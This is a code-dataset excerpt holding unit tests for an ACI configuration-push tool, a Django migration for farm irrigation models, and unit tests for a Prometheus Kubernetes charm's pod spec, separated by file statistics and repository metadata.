"action": "ALLOW"
},
{
"port": [
1,
1
],
"proto": 17,
"action": "ALLOW"
}
]
}
]
}
"""
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False, useipEpgs=True)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 2,
"filter count did not match for the pushed config and existing config")
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 3,
"epgs count did not match for the pushed config and existing config")
for existing_epg in existing_epgs:
if existing_epg.name != 'base':
self.assertTrue(existing_epg.is_attributed_based,
"uSeg EPG is not created for " + existing_epg.name)
existing_attributeCriterions = existing_epg.get_children(AttributeCriterion)
for existing_attributeCriterion in existing_attributeCriterions:
self.assertTrue(len(existing_attributeCriterion.get_ip_addresses()) == 2,
"uSeg Attributes did not match")
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 1,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
for child_contract_subject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contract_subject.get_filters()), 2,
"num of filters in contract_subject did not match " + child_contract_subject.name)
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 1,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 1,
"existing_contexts count did not match for the pushed config and existing config")
def test_useipepgs_update_for_bridgeDomain(self):
"""
push without useipepgs and check for bridgeDomain
bridgeDomain should not be deleted once it is created
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 2,
"filter count did not match for the pushed config and existing config")
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(
app.name,
'appProfile-test',
"application profile name didnot match with the default appProfile-test")
outsideL3s = tenant.get_children(OutsideL3)
self.assertEquals(
outsideL3s[0].name,
'l3ext-test',
"External routed network with default name doesnot exist l3ext-test")
for outsideL3 in outsideL3s:
if outsideL3.name == 'l3ext-test':
outsideEpgs = outsideL3.get_children(OutsideEPG)
self.assertEquals(len(outsideEpgs), 0, "the num of outside epgs didnot match")
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 3,
"epgs count did not match for the pushed config and existing config")
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 1,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
for child_contractSubject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contractSubject.get_filters()), 2,
"num of filters in contract subject did not match " + child_contractSubject.name)
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 1,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 1,
"existing_contexts count did not match for the pushed config and existing config")
class TestCheckForAllTheJsonConfigs(unittest.TestCase):
"""
test case to push a ontract config from a specific json.
After it is pushed successfully using Apicservice,
then tenant.get_deep() is compared with the expected json
"""
def test_configpush_test1_policies(self):
"""
configpush_test1_policies.json
providing configpush_test1_policies.json to apicservice and
comparing with the expected json
"""
config_file = 'configpush_test1_policies.json.gz'
tenant_name = 'configpush_test1_policies'
load_config = LoadConfig()
load_config.delete_tenant(tenant_name)
load_config.load_configFile(config_file, tenant_name="configpush_test1_policies")
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
tenant_existing = ast.literal_eval(json.dumps(tenant.get_json()))
with gzip.open('configpush_test1_policies_tenant_golden.json.gz', 'rb') as data_file:
tenant_expected = ast.literal_eval(data_file.read())
self.assertEqual(DeepDiff(tenant_existing, tenant_expected, ignore_order=True), {})
def test_configpush_test1_policies_with_useipEpgs(self):
"""
configpush_test1_policies.json
providing configpush_test1_policies.json to apicservice and
comparing with the expected json
"""
config_file = 'configpush_test1_policies.json.gz'
tenant_name = 'configpush_test1_policies'
load_config = LoadConfig()
load_config.delete_tenant(tenant_name)
load_config.load_configFile(config_file, tenant_name="configpush_test1_policies", useipEpgs=True)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
tenant_existing = ast.literal_eval(json.dumps(tenant.get_json()))
with gzip.open('configpush_test1_policies_with_useipEpgs_tenant_golden.json.gz', 'rb') as data_file:
tenant_expected = ast.literal_eval(data_file.read())
self.assertEqual(DeepDiff(tenant_existing, tenant_expected, ignore_order=True), {})
def test_configpush_test2_policies(self):
"""
configpush_test2_policies.json
providing configpush_test2_policies.json to apicservice and
comparing with the expected json
"""
config_file = 'configpush_test2_policies.json.gz'
tenant_name = 'configpush_test2_policies'
load_config = LoadConfig()
load_config.delete_tenant(tenant_name)
load_config.load_configFile(config_file, tenant_name="configpush_test2_policies")
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
tenant_existing = ast.literal_eval(json.dumps(tenant.get_json()))
with gzip.open('configpush_test2_policies_tenant_golden.json.gz', 'rb') as data_file:
tenant_expected = ast.literal_eval(data_file.read())
self.assertEqual(DeepDiff(tenant_existing, tenant_expected, ignore_order=True), {})
def test_configpush_test2_policies_with_useipEpgs(self):
"""
configpush_test2_policies.json
providing configpush_test2_policies.json to apicservice and
comparing with the expected json
"""
config_file = 'configpush_test2_policies.json.gz'
tenant_name = 'configpush_test2_policies'
load_config = LoadConfig()
load_config.delete_tenant(tenant_name)
load_config.load_configFile(config_file, tenant_name="configpush_test2_policies", useipEpgs=True)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
tenant_existing = ast.literal_eval(json.dumps(tenant.get_json()))
with gzip.open('configpush_test2_policies_with_useipEpgs_tenant_golden.json.gz', 'rb') as data_file:
tenant_expected = ast.literal_eval(data_file.read())
self.assertEqual(DeepDiff(tenant_existing, tenant_expected, ignore_order=True), {})
def test_configpush_test3_policies(self):
"""
configpush_test3_policies.json
providing configpush_test3_policies.json to apicservice and
comparing with the expected json
"""
config_file = 'configpush_test3_policies.json.gz'
tenant_name = 'configpush_test3_policies'
load_config = LoadConfig()
load_config.delete_tenant(tenant_name)
load_config.load_configFile(config_file, tenant_name="configpush_test3_policies")
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
tenant_existing = ast.literal_eval(json.dumps(tenant.get_json()))
with gzip.open('configpush_test3_policies_tenant_golden.json.gz', 'rb') as data_file:
tenant_expected = ast.literal_eval(data_file.read())
self.assertEqual(DeepDiff(tenant_existing, tenant_expected, ignore_order=True), {})
def test_configpush_test3_policies_with_useipEpgs(self):
"""
configpush_test3_policies.json
providing configpush_test3_policies.json to apicservice and
comparing with the expected json
"""
config_file = 'configpush_test3_policies.json.gz'
tenant_name = 'configpush_test3_policies'
load_config = LoadConfig()
load_config.delete_tenant(tenant_name)
load_config.load_configFile(config_file, tenant_name="configpush_test3_policies", useipEpgs=True)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
tenant_existing = ast.literal_eval(json.dumps(tenant.get_json()))
with gzip.open('configpush_test3_policies_with_useipEpgs_tenant_golden.json.gz', 'rb') as data_file:
tenant_expected = ast.literal_eval(data_file.read())
self.assertEqual(DeepDiff(tenant_existing, tenant_expected, ignore_order=True), {})
def test_configpush_test4_policies(self):
"""
configpush_test4_policies.json
providing configpush_test4_policies.json to apicservice and
comparing with the expected json
"""
config_file = 'configpush_test4_policies.json.gz'
tenant_name = 'configpush_test4_policies'
load_config = LoadConfig()
load_config.delete_tenant(tenant_name)
load_config.load_configFile(config_file, tenant_name="configpush_test4_policies")
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
tenant_existing = ast.literal_eval(json.dumps(tenant.get_json()))
with gzip.open('configpush_test4_policies_tenant_golden.json.gz', 'rb') as data_file:
tenant_expected = ast.literal_eval(data_file.read())
self.assertEqual(DeepDiff(tenant_existing, tenant_expected, ignore_order=True), {})
def test_configpush_test4_policies_with_useipEpgs(self):
"""
configpush_test4_policies.json
providing configpush_test4_policies.json to apicservice and
comparing with the expected json
"""
config_file = 'configpush_test4_policies.json.gz'
tenant_name = 'configpush_test4_policies'
load_config = LoadConfig()
load_config.delete_tenant(tenant_name)
load_config.load_configFile(config_file, tenant_name="configpush_test4_policies", useipEpgs=True)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
tenant_existing = ast.literal_eval(json.dumps(tenant.get_json()))
with gzip.open('configpush_test4_policies_with_useipEpgs_tenant_golden.json.gz', 'rb') as data_file:
tenant_expected = ast.literal_eval(data_file.read())
self.assertEqual(DeepDiff(tenant_existing, tenant_expected, ignore_order=True), {})
if __name__ == '__main__':
configpush = unittest.TestSuite()
configpush.addTest(unittest.makeSuite(TestConfigpush))
configpush.addTest(unittest.makeSuite(TestCheckForAllTheJsonConfigs))
unittest.main()
| 37.744148
| 199
| 0.539599
| 11,663
| 116,101
| 5.171997
| 0.030352
| 0.029675
| 0.025895
| 0.026923
| 0.916563
| 0.906898
| 0.898344
| 0.890983
| 0.886391
| 0.88097
| 0
| 0.052233
| 0.354088
| 116,101
| 3,075
| 200
| 37.756423
| 0.752144
| 0.000319
| 0
| 0.72894
| 0
| 0
| 0.424281
| 0.079096
| 0
| 0
| 0
| 0
| 0.085361
| 0
| null | null | 0.002246
| 0.004493
| null | null | 0.006739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
14afe96992ebf23e6baeb6f0f95d35b2316307c4
| 4,790
|
py
|
Python
|
irrigator_pro/farms/migrations/0007_auto_20150614_1333.py
|
warnes/irrigatorpro
|
4838f8832bdbf87f394a0298adc5dabfc26e82e8
|
[
"MIT"
] | null | null | null |
irrigator_pro/farms/migrations/0007_auto_20150614_1333.py
|
warnes/irrigatorpro
|
4838f8832bdbf87f394a0298adc5dabfc26e82e8
|
[
"MIT"
] | null | null | null |
irrigator_pro/farms/migrations/0007_auto_20150614_1333.py
|
warnes/irrigatorpro
|
4838f8832bdbf87f394a0298adc5dabfc26e82e8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('farms', '0006_auto_20150603_2146'),
]
operations = [
migrations.RemoveField(
model_name='probe',
name='field',
),
migrations.AddField(
model_name='probereading',
name='comment',
field=models.TextField(blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='probereading',
name='ignore',
field=models.BooleanField(default=False),
preserve_default=True,
),
migrations.AddField(
model_name='probereading',
name='irrigation',
field=models.DecimalField(default=0.0, verbose_name=b'irrigation in inches', max_digits=4, decimal_places=2, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='probereading',
name='max_temp_24_hours',
field=models.DecimalField(null=True, verbose_name=b'Maximum temperature in last 24 hours', max_digits=5, decimal_places=2, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='probereading',
name='min_temp_24_hours',
field=models.DecimalField(null=True, verbose_name=b'Minimum temperature in last 24 hours', max_digits=5, decimal_places=2, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='probereading',
name='rain',
field=models.DecimalField(default=0.0, verbose_name=b'rainfall in inches', max_digits=4, decimal_places=2, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='waterhistory',
name='ignore',
field=models.BooleanField(default=False),
preserve_default=True,
),
migrations.AddField(
model_name='waterhistory',
name='max_temp_24_hours',
field=models.DecimalField(null=True, verbose_name=b'Maximum temperature in last 24 hours', max_digits=5, decimal_places=2, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='waterhistory',
name='min_temp_24_hours',
field=models.DecimalField(null=True, verbose_name=b'Minimum temperature in last 24 hours', max_digits=5, decimal_places=2, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='waterhistory',
name='soil_potential_16',
field=models.DecimalField(default=0.0, null=True, max_digits=5, decimal_places=2, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='waterhistory',
name='soil_potential_24',
field=models.DecimalField(default=0.0, null=True, max_digits=5, decimal_places=2, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='waterhistory',
name='soil_potential_8',
field=models.DecimalField(default=0.0, null=True, max_digits=5, decimal_places=2, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='probereading',
name='soil_potential_16',
field=models.DecimalField(default=0.0, null=True, max_digits=5, decimal_places=2, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='probereading',
name='soil_potential_24',
field=models.DecimalField(default=0.0, null=True, max_digits=5, decimal_places=2, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='probereading',
name='soil_potential_8',
field=models.DecimalField(default=0.0, null=True, max_digits=5, decimal_places=2, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='waterhistory',
name='irrigation',
field=models.DecimalField(default=0.0, verbose_name=b'irrigation in inches', max_digits=4, decimal_places=2, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='waterhistory',
name='rain',
field=models.DecimalField(default=0.0, verbose_name=b'rainfall in inches', max_digits=4, decimal_places=2, blank=True),
preserve_default=True,
),
]
| 39.586777
| 147
| 0.60501
| 505
| 4,790
| 5.534653
| 0.132673
| 0.057961
| 0.115564
| 0.166011
| 0.919141
| 0.919141
| 0.903757
| 0.903757
| 0.903757
| 0.89517
| 0
| 0.026632
| 0.286639
| 4,790
| 120
| 148
| 39.916667
| 0.791337
| 0.004384
| 0
| 0.885965
| 0
| 0
| 0.142018
| 0.004825
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017544
| 0
| 0.04386
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1adbae64bb2e55f83dfcbef5ca1aac25a3ded370
| 23,583
|
py
|
Python
|
installers/charm/prometheus/tests/test_pod_spec.py
|
ayoubbargueoui1996/osm-devops
|
b5973c2a4477354bb17a56fe39559f277a3a994a
|
[
"Apache-2.0"
] | null | null | null |
installers/charm/prometheus/tests/test_pod_spec.py
|
ayoubbargueoui1996/osm-devops
|
b5973c2a4477354bb17a56fe39559f277a3a994a
|
[
"Apache-2.0"
] | null | null | null |
installers/charm/prometheus/tests/test_pod_spec.py
|
ayoubbargueoui1996/osm-devops
|
b5973c2a4477354bb17a56fe39559f277a3a994a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2020 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# For those usages not covered by the Apache License, Version 2.0 please
# contact: legal@canonical.com
#
# To get in touch with the maintainers, please contact:
# osm-charmers@lists.launchpad.net
##
from typing import NoReturn
import unittest
import pod_spec
class TestPodSpec(unittest.TestCase):
"""Pod spec unit tests."""
def test_make_pod_ports(self) -> NoReturn:
"""Testing make pod ports."""
port = 9090
expected_result = [
{
"name": "prometheus",
"containerPort": port,
"protocol": "TCP",
}
]
pod_ports = pod_spec._make_pod_ports(port)
self.assertListEqual(expected_result, pod_ports)
def test_make_pod_envconfig(self) -> NoReturn:
"""Testing make pod envconfig."""
config = {}
relation_state = {}
expected_result = {}
pod_envconfig = pod_spec._make_pod_envconfig(config, relation_state)
self.assertDictEqual(expected_result, pod_envconfig)
def test_make_pod_ingress_resources_without_site_url(self) -> NoReturn:
"""Testing make pod ingress resources without site_url."""
config = {"site_url": ""}
app_name = "prometheus"
port = 9090
pod_ingress_resources = pod_spec._make_pod_ingress_resources(
config, app_name, port
)
self.assertIsNone(pod_ingress_resources)
def test_make_pod_ingress_resources(self) -> NoReturn:
"""Testing make pod ingress resources."""
config = {
"site_url": "http://prometheus",
"max_file_size": 0,
"ingress_whitelist_source_range": "",
}
app_name = "prometheus"
port = 9090
expected_result = [
{
"name": f"{app_name}-ingress",
"annotations": {
"nginx.ingress.kubernetes.io/proxy-body-size": f"{config['max_file_size']}",
"nginx.ingress.kubernetes.io/ssl-redirect": "false",
},
"spec": {
"rules": [
{
"host": app_name,
"http": {
"paths": [
{
"path": "/",
"backend": {
"serviceName": app_name,
"servicePort": port,
},
}
]
},
}
]
},
}
]
pod_ingress_resources = pod_spec._make_pod_ingress_resources(
config, app_name, port
)
self.assertListEqual(expected_result, pod_ingress_resources)
def test_make_pod_ingress_resources_with_whitelist_source_range(self) -> NoReturn:
"""Testing make pod ingress resources with whitelist_source_range."""
config = {
"site_url": "http://prometheus",
"max_file_size": 0,
"ingress_whitelist_source_range": "0.0.0.0/0",
}
app_name = "prometheus"
port = 9090
expected_result = [
{
"name": f"{app_name}-ingress",
"annotations": {
"nginx.ingress.kubernetes.io/proxy-body-size": f"{config['max_file_size']}",
"nginx.ingress.kubernetes.io/ssl-redirect": "false",
"nginx.ingress.kubernetes.io/whitelist-source-range": config[
"ingress_whitelist_source_range"
],
},
"spec": {
"rules": [
{
"host": app_name,
"http": {
"paths": [
{
"path": "/",
"backend": {
"serviceName": app_name,
"servicePort": port,
},
}
]
},
}
]
},
}
]
pod_ingress_resources = pod_spec._make_pod_ingress_resources(
config, app_name, port
)
self.assertListEqual(expected_result, pod_ingress_resources)
def test_make_pod_ingress_resources_with_https(self) -> NoReturn:
"""Testing make pod ingress resources with HTTPs."""
config = {
"site_url": "https://prometheus",
"max_file_size": 0,
"ingress_whitelist_source_range": "",
"tls_secret_name": "",
}
app_name = "prometheus"
port = 9090
expected_result = [
{
"name": f"{app_name}-ingress",
"annotations": {
"nginx.ingress.kubernetes.io/proxy-body-size": f"{config['max_file_size']}",
},
"spec": {
"rules": [
{
"host": app_name,
"http": {
"paths": [
{
"path": "/",
"backend": {
"serviceName": app_name,
"servicePort": port,
},
}
]
},
}
],
"tls": [{"hosts": [app_name]}],
},
}
]
pod_ingress_resources = pod_spec._make_pod_ingress_resources(
config, app_name, port
)
self.assertListEqual(expected_result, pod_ingress_resources)
def test_make_pod_ingress_resources_with_https_tls_secret_name(self) -> NoReturn:
"""Testing make pod ingress resources with HTTPs and TLS secret name."""
config = {
"site_url": "https://prometheus",
"max_file_size": 0,
"ingress_whitelist_source_range": "",
"tls_secret_name": "secret_name",
}
app_name = "prometheus"
port = 9090
expected_result = [
{
"name": f"{app_name}-ingress",
"annotations": {
"nginx.ingress.kubernetes.io/proxy-body-size": f"{config['max_file_size']}",
},
"spec": {
"rules": [
{
"host": app_name,
"http": {
"paths": [
{
"path": "/",
"backend": {
"serviceName": app_name,
"servicePort": port,
},
}
]
},
}
],
"tls": [
{"hosts": [app_name], "secretName": config["tls_secret_name"]}
],
},
}
]
pod_ingress_resources = pod_spec._make_pod_ingress_resources(
config, app_name, port
)
self.assertListEqual(expected_result, pod_ingress_resources)
def test_make_pod_files(self) -> NoReturn:
"""Testing make pod files."""
config = {
"web_subpath": "/",
"default_target": "",
"site_url": "",
}
expected_result = [
{
"name": "config",
"mountPath": "/etc/prometheus",
"files": [
{
"path": "prometheus.yml",
"content": (
"global:\n"
" scrape_interval: 15s\n"
" evaluation_interval: 15s\n"
"alerting:\n"
" alertmanagers:\n"
" - static_configs:\n"
" - targets:\n"
"rule_files:\n"
"scrape_configs:\n"
" - job_name: 'prometheus'\n"
" static_configs:\n"
" - targets: [{}]\n".format(config["default_target"])
),
}
],
}
]
pod_envconfig = pod_spec._make_pod_files(config)
self.assertListEqual(expected_result, pod_envconfig)
def test_make_readiness_probe(self) -> NoReturn:
"""Testing make readiness probe."""
port = 9090
expected_result = {
"httpGet": {
"path": "/-/ready",
"port": port,
},
"initialDelaySeconds": 10,
"timeoutSeconds": 30,
}
readiness_probe = pod_spec._make_readiness_probe(port)
self.assertDictEqual(expected_result, readiness_probe)
def test_make_liveness_probe(self) -> NoReturn:
"""Testing make liveness probe."""
port = 9090
expected_result = {
"httpGet": {
"path": "/-/healthy",
"port": port,
},
"initialDelaySeconds": 30,
"periodSeconds": 30,
}
liveness_probe = pod_spec._make_liveness_probe(port)
self.assertDictEqual(expected_result, liveness_probe)
def test_make_pod_command(self) -> NoReturn:
"""Testing make pod command."""
port = 9090
config = {
"web_subpath": "/",
"default_target": "",
"site_url": "",
}
expected_result = [
"/bin/prometheus",
"--config.file=/etc/prometheus/prometheus.yml",
"--storage.tsdb.path=/prometheus",
"--web.console.libraries=/usr/share/prometheus/console_libraries",
"--web.console.templates=/usr/share/prometheus/consoles",
"--web.route-prefix={}".format(config.get("web_subpath")),
"--web.external-url=http://localhost:{}{}".format(
port, config.get("web_subpath")
),
]
pod_envconfig = pod_spec._make_pod_command(config, port)
self.assertListEqual(expected_result, pod_envconfig)
def test_make_pod_command_with_web_admin_api_enabled(self) -> NoReturn:
"""Testing make pod command."""
port = 9090
config = {
"web_subpath": "/",
"default_target": "",
"site_url": "",
"enable_web_admin_api": True,
}
expected_result = [
"/bin/prometheus",
"--config.file=/etc/prometheus/prometheus.yml",
"--storage.tsdb.path=/prometheus",
"--web.console.libraries=/usr/share/prometheus/console_libraries",
"--web.console.templates=/usr/share/prometheus/consoles",
"--web.route-prefix={}".format(config.get("web_subpath")),
"--web.external-url=http://localhost:{}{}".format(
port, config.get("web_subpath")
),
"--web.enable-admin-api",
]
pod_envconfig = pod_spec._make_pod_command(config, port)
self.assertListEqual(expected_result, pod_envconfig)
def test_make_pod_spec(self) -> NoReturn:
"""Testing make pod spec."""
image_info = {"upstream-source": "ubuntu/prometheus:latest"}
config = {
"web_subpath": "/",
"default_target": "",
"site_url": "",
"enable_web_admin_api": False,
}
relation_state = {}
app_name = "prometheus"
port = 9090
expected_result = {
"version": 3,
"containers": [
{
"name": app_name,
"imageDetails": image_info,
"imagePullPolicy": "Always",
"ports": [
{
"name": app_name,
"containerPort": port,
"protocol": "TCP",
}
],
"envConfig": {},
"volumeConfig": [
{
"name": "config",
"mountPath": "/etc/prometheus",
"files": [
{
"path": "prometheus.yml",
"content": (
"global:\n"
" scrape_interval: 15s\n"
" evaluation_interval: 15s\n"
"alerting:\n"
" alertmanagers:\n"
" - static_configs:\n"
" - targets:\n"
"rule_files:\n"
"scrape_configs:\n"
" - job_name: 'prometheus'\n"
" static_configs:\n"
" - targets: [{}]\n".format(
config.get("default_target")
)
),
}
],
}
],
"command": [
"/bin/prometheus",
"--config.file=/etc/prometheus/prometheus.yml",
"--storage.tsdb.path=/prometheus",
"--web.console.libraries=/usr/share/prometheus/console_libraries",
"--web.console.templates=/usr/share/prometheus/consoles",
"--web.route-prefix={}".format(config.get("web_subpath")),
"--web.external-url=http://localhost:{}{}".format(
port, config.get("web_subpath")
),
],
"kubernetes": {
"readinessProbe": {
"httpGet": {
"path": "/-/ready",
"port": port,
},
"initialDelaySeconds": 10,
"timeoutSeconds": 30,
},
"livenessProbe": {
"httpGet": {
"path": "/-/healthy",
"port": port,
},
"initialDelaySeconds": 30,
"periodSeconds": 30,
},
},
}
],
"kubernetesResources": {"ingressResources": []},
}
spec = pod_spec.make_pod_spec(
image_info, config, relation_state, app_name, port
)
self.assertDictEqual(expected_result, spec)
def test_make_pod_spec_with_ingress(self) -> NoReturn:
"""Testing make pod spec."""
image_info = {"upstream-source": "ubuntu/prometheus:latest"}
config = {
"web_subpath": "/",
"default_target": "",
"site_url": "https://prometheus",
"tls_secret_name": "prometheus",
"max_file_size": 0,
"ingress_whitelist_source_range": "0.0.0.0/0",
"enable_web_admin_api": False,
}
relation_state = {}
app_name = "prometheus"
port = 9090
expected_result = {
"version": 3,
"containers": [
{
"name": app_name,
"imageDetails": image_info,
"imagePullPolicy": "Always",
"ports": [
{
"name": app_name,
"containerPort": port,
"protocol": "TCP",
}
],
"envConfig": {},
"volumeConfig": [
{
"name": "config",
"mountPath": "/etc/prometheus",
"files": [
{
"path": "prometheus.yml",
"content": (
"global:\n"
" scrape_interval: 15s\n"
" evaluation_interval: 15s\n"
"alerting:\n"
" alertmanagers:\n"
" - static_configs:\n"
" - targets:\n"
"rule_files:\n"
"scrape_configs:\n"
" - job_name: 'prometheus'\n"
" static_configs:\n"
" - targets: [{}]\n".format(
config.get("default_target")
)
),
}
],
}
],
"command": [
"/bin/prometheus",
"--config.file=/etc/prometheus/prometheus.yml",
"--storage.tsdb.path=/prometheus",
"--web.console.libraries=/usr/share/prometheus/console_libraries",
"--web.console.templates=/usr/share/prometheus/consoles",
"--web.route-prefix={}".format(config.get("web_subpath")),
"--web.external-url=http://localhost:{}{}".format(
port, config.get("web_subpath")
),
],
"kubernetes": {
"readinessProbe": {
"httpGet": {
"path": "/-/ready",
"port": port,
},
"initialDelaySeconds": 10,
"timeoutSeconds": 30,
},
"livenessProbe": {
"httpGet": {
"path": "/-/healthy",
"port": port,
},
"initialDelaySeconds": 30,
"periodSeconds": 30,
},
},
}
],
"kubernetesResources": {
"ingressResources": [
{
"name": "{}-ingress".format(app_name),
"annotations": {
"nginx.ingress.kubernetes.io/proxy-body-size": str(
config.get("max_file_size")
),
"nginx.ingress.kubernetes.io/whitelist-source-range": config.get(
"ingress_whitelist_source_range"
),
},
"spec": {
"rules": [
{
"host": app_name,
"http": {
"paths": [
{
"path": "/",
"backend": {
"serviceName": app_name,
"servicePort": port,
},
}
]
},
}
],
"tls": [
{
"hosts": [app_name],
"secretName": config.get("tls_secret_name"),
}
],
},
}
],
},
}
spec = pod_spec.make_pod_spec(
image_info, config, relation_state, app_name, port
)
self.assertDictEqual(expected_result, spec)
def test_make_pod_spec_without_image_info(self) -> NoReturn:
"""Testing make pod spec without image_info."""
image_info = None
config = {
"web_subpath": "/",
"default_target": "",
"site_url": "",
"enable_web_admin_api": False,
}
relation_state = {}
app_name = "prometheus"
port = 9090
spec = pod_spec.make_pod_spec(
image_info, config, relation_state, app_name, port
)
self.assertIsNone(spec)
def test_make_pod_spec_without_config(self) -> NoReturn:
"""Testing make pod spec without config."""
image_info = {"upstream-source": "ubuntu/prometheus:latest"}
config = {}
relation_state = {}
app_name = "prometheus"
port = 9090
with self.assertRaises(ValueError):
pod_spec.make_pod_spec(image_info, config, relation_state, app_name, port)
if __name__ == "__main__":
unittest.main()
| 36.790952
| 96
| 0.382606
| 1,588
| 23,583
| 5.430101
| 0.138539
| 0.034095
| 0.055085
| 0.042677
| 0.857358
| 0.828482
| 0.79288
| 0.753334
| 0.715644
| 0.671576
| 0
| 0.010466
| 0.513802
| 23,583
| 640
| 97
| 36.848438
| 0.741584
| 0.057881
| 0
| 0.659218
| 0
| 0
| 0.221021
| 0.074669
| 0
| 0
| 0
| 0
| 0.029795
| 1
| 0.029795
| false
| 0
| 0.005587
| 0
| 0.037244
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ae4a0e6b39bb467bae8f236057e5c41611c02df
| 526
|
py
|
Python
|
add.py
|
mockupcode/chia-add-node
|
